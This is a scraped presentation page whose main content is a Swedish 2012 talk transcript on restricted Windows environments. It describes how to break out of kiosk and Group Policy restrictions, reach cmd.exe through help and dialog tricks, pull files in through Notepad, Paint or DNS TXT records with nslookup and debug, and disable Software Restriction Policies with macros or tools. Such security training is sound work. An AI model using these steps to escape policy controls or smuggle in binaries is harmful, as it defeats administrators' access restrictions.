NETinfo 2012-09-27 Magnus Persson Johan Silverup Epost: Telefon: 046 – 222 13 60.

Slides:



Advertisements
Liknande presentationer
Operativsystem.
Advertisements

BAS-M Hur du på ett enkelt sätt administrerar din båtklubbs register.
Klicka på ”Verktyg” i menyn, välj ”Alternativ”..
Skapa ett video-CV på YouTube
Intagningssystemets databas Ögonblicksbild Kopia av intagningsdatabasen Uppdateras 3 ggr per dag 07:15 – 12:15 – 15:15 Roller Skola, kommun Periodiseras.
Hur kan drift av Topobase underlättas ?
Välkommen till internet för nybörjare
system för handläggarstöd
Klicka på Aktivera redigering i meddelandefältet,
Några moln tillgängliga gratis på Internet
Flexicon – Din systempartner
Hur ger vi snabbt de kunskaperna? Vi behöver ge våra blivande e- handläggare förkunskaper, för att de ska klara sina utbildningar och uppdrag.
Frågor Allmän IT-kunskap avsnitt 1 kapitel 1 Repetition 4
Persondatorer Felsökning och felhantering ”Vista” (Kapitel 10)
Mjukvara och nätverk Vad är det?.
Internet Explorer Browser - läsare
Internet Juni 2013.
Programmering B PHP Lektion 1
Hur gör vi på insidan?. Namn på AD? • Spelar det någon roll? • Kommun.se • Kommun.ad • Kommun.local • Ad.kommun.se • Hur validerar vi DNSSEC om AD och.
Azure Web sites IRL Robert Folkesson Active
IT-arbetsplatser Anders Sjöö
”Ett sätt att distribuera Business Objects via webben”
Sweden SharePoint User Group WictorWilén
NETinfo Magnus Persson Epost: Telefon: 046 –
NETinfo Magnus Persson Epost: Telefon: 046 –
NETinfo Magnus Persson Peter Hallin Epost: Telefon: 046 –
NETinfo Magnus Persson Epost: Telefon: 046 –
NETinfo 2009–10-09 Magnus Persson Epost: Telefon: 046 –
NETinfo Magnus Persson Epost: Telefon: 046 –
2007 Microsoft Office System - Klienten Pontus Haglund Mid Market Solutions Specialist Microsoft AB.
Virus och skräppost
Nätverk Logistikprogrammet 2012.
Mahmud Al Hakim Webmaster DAG 11 VT09 Mahmud Al Hakim
TIPS & RÅDAKUTEN av Lina och Johan. SÖKA, LAGRA och ÖVERFÖRA INFORMATION PÅ DATORN - SÅ KAN DU GÖRA!
Programmering B PHP Lektion 1 Mahmud Al Hakim Folkuniversitetet
Välkommen till Del 1.
PROCESSPROGRAMMERING Föreläsning ‏ Innehåll: Högnivå objekt för trådprogrammering: - Trådgrupper (”Thread pools”)‏ - Exekverare (Executor.
Bildfabriken kan ställas in på olika sätt - se några exempel
Mitt första Java program Mahmud Al Hakim Copyright, Mahmud Al Hakim, 1.
Sveriges lantbruksuniversitet Presentation av EPrints publiceringsverktyg Workshop - Öppet arkiv för världslitteratur och globala rättvisefrågor.
Operativsystem i nätverk
NETinfo Magnus Persson Epost: Telefon: 046 –
A Federation-Ninja’s warstories from the field…
Träning 13 Makroprogrammering
Lync-möten Ansluta till ett Lync-möte Schemalägga ett Lync-möte
Flexicon – Din systempartner
Mahmud Al Hakim 2  Mål för kursen  Kursplanering  Kurslitteratur  Betygsättning  Grunder om databaser  Tabeller.
Java paket och jar-filer
Koha En presentation av bibliotekssystemet Koha. Projeketets syfte & mål Projektets syfte är att öka kunskapsnivån i Halland och Sverige kring bibliotekssystemet.
INTRODUKTION TILL PROGRAMMERING
Personal Computer Hardware (Hårdvaran i PC) Personal Computers And Applications (PC och PC-applikationer)
 Installation av Windows Vista (Kapitel 9)  Haidar Al Attar (IT lärare)  Jensen Education.
Välkommen till årets andra nätverksträff Sundsvall 30 maj, 2006 Funda Denizhan och Magnus Burell Verva, Nätverket 24-timmarswebben.
Network Services (Nätverkstjänster) Client/Servers And Their Interaction (Client/Server och deras interaktion)
Informationsteknologi - Lektion 2 Trådlöst nätverk (WLAN) Trådlöst nätverk (WLAN) Filarkivet: Filarkivet:
Security Management John Laerum Instruktör Upprätthålla säkerhetsnivån Group Policies i Active Directory IIS Lockdown tool och IIS 6 VPN karantän i RAS.
Varför byta? html> Ny sida 3 Tillverka i egna datorn tex i FrontPage Spara på den egna hårddisk FTP- program Server.
NETinfo Magnus Persson Epost: Telefon: 046 –
William Sandqvist PIC-programmeringsmiljön i skolan Datorerna i skolans labsalar är centralt underhållna. Du har inte rättigheter att installera.
LU Desktop.
NETinfo 2007–02-27 Magnus Persson Epost: Telefon: 046 –
Ladda ner och installera JAVA Mahmud Al Hakim DynamicOS
Copyright, Mahmud Al Hakim, Hakimdata.se Agenda  Kunskapstest  Windows Skrivbord (Desktop)  Aktivitetsfält  Fönster och menyer  Systemåterställning.
Windows Live Messenger. MSN. Vad är Windows Live Messenger ? Ett klient program för direktmeddelanden, dvs ett program som laddas ned från Internet och.
William Sandqvist Funktionsbibliotek När man utvecklat en funktion så långt att den är "färdigutvecklad" kan man lika gärna spara den på.
Lab Contact 1  Lab Assistants:  Meng Liu, Group B  Sara Abbaspour, Group A
Operativsystem Vad är det för något ? Varför har man operativsystem ? Vilka finns det ?
Windows brandvägg s105 Använd mjukvarubrandvägg även om du har brandvägg i router/gateway mjukvarubrandvägg skyddar mot intrång inom det lokala nätverket.
Lycka till med din dator! Fler guider på Good Luck!
Genomgång av Automation Builder
Presentationens avskrift:

NETinfo Magnus Persson Johan Silverup Epost: Telefon: 046 –

Netinfo Begränsade datormiljöer - Vilka typer finns det? - Hur fungerar de? - Hur bryter man sig ut ur dem?

Olika typer av begränsningar Fysiska begränsningar; BIOS, mm Filtrering av trafik; IPS, brandvägg, mm Windows OS och domänkontroller

Windows OS kontroller Group Policy Objects (GPO) Software Restriction Policies (SRP) Tredje parts program

Group Policy Objects Kan begränsa användning av tjänster – IE, Windows Explorer, cmd.exe, mm Kan dölja saker – Menyer, ikoner, kontrollpanelen, mm Hundratals olika inställningar

Software Restriction Policies Är definierade i GPO Begränsar vilka program som får köras Två inställningar – Unrestricted – Disallowed

Vad vill vi ha? Kommandofönster, cmd.exe Ändra i filer, t.ex. notepad.exe Hämta filer, t.ex. en webbrowser

Utbrytning #1 Få upp en utskriftsdialogruta Klicka lägg till skrivare Leta efter nätverksskrivare, vilket namn som helst Felmeddelande; klicka på “Help and support center” Följ anvisningarna på nästa sida

Utbrytning #2 Klicka Help (F1) → Options → Home Klicka ”Help and Support Center” Klicka “Get Support or go to Win Newsgroup” Klicka “Go to Win Web site forum” Nu får du en webbläsare

Utbrytning #3 Under Hjälp, hitta Options → Internet options Gå till Browsing history under fliken General Klicka Settnings → View files eller View objects Explorer startar, gå till C:\System\Windows32 Högerklicka på cmd.exe och välj Run eller Open

Utbrytning #4 Fungerar med många program i Windows Klicka Hjälp → About → EULA Notepad startar!

Utbrytning #5 Dölj filer/foldrar i dialogrutor mha GPO Explorer visar inte dem Man kan fortfarande skriva in hela sökvägen C:\Windows\System32\cmd.exe

Utbrytning #6 Välj Help och högerklicka på programrutan i taskbar Välj “Jump to URL” Välj “file:\\C:\Windows\System32\cmd.exe”file:\\C:\Windows\System32\cmd.exe Välj Run när systemet frågar vad du vill göra Testa också –“ms-its:C\:Windows\Help\admtools.chm::\Admtools.html”

Hacka Kioskdatorer via WWW Skaffa access till en webbläasre Surfa till Stor samling interaktiva verktyg Windows/Linux/PhotoKat e

Så vad gör vi nu? Det finns många sätt att lura GPO utan SRP Vi har nu startat upp program Vad kan vi göra med dem?

Hämta filer med Notepad / Wordpad Klicka på Open file Skriv in URL i fältet Ftp:// / Ftp:// File:// / File:// Filen hämtas och lagras i Temporary Internet Files

Hämta filer med MS Paint Paint hämtar filer på samma sätt som Notepad Paint förstår bara bild-filer men de mellanlagras i – C:\Documents And Settings\ \Temporary Internet Files\Content.IE5\xxxxx\ C:\Documents

Hämta filer med nslookup Kräver egen domän och DNS-server Konvertera binärfiler till ASCII (dbgtool) Lägg in koden i DNS-serverns TXT-fält ”nslookup -querytype=TXT hackme.mydom.net”

Hämta filer med nslookup (2) Konvertera tillbaks från ASCII → binärkod Vi använder debugger som följer med Windows – ”debug < evil-ascii.txt” – ”ren #TEMP# evil-binary.exe”

Filer skyddade med SPR Det är svårare att komma runt SPR GPO gömmer bara filer och funktioner SPR hindrar filer att exekveras

Exekvera via “runas” ”Runas” exekverar filer under en annan användare ”runas /savecred /user: ” Fungerar inte om man väljer ”current user”

Kör kod via Excel All exekverbar kod kan inte skyddas med SPR Macro i Office-program är en “bakdörr” Man kan ladda binärkod i Excel-ark och exekvera Exekvera från Excelmacro med create_thread()

Manipulera processer ”gpdisable” Fanns på Sysinternals Hindrar access till en registernyckel för SPR e

Manipulera processer Basic Process Manipulation Toolkit (BPMT) Kan avaktivera GPO och SPR Körs från kommando-skal

NETinfo FRÅGOR?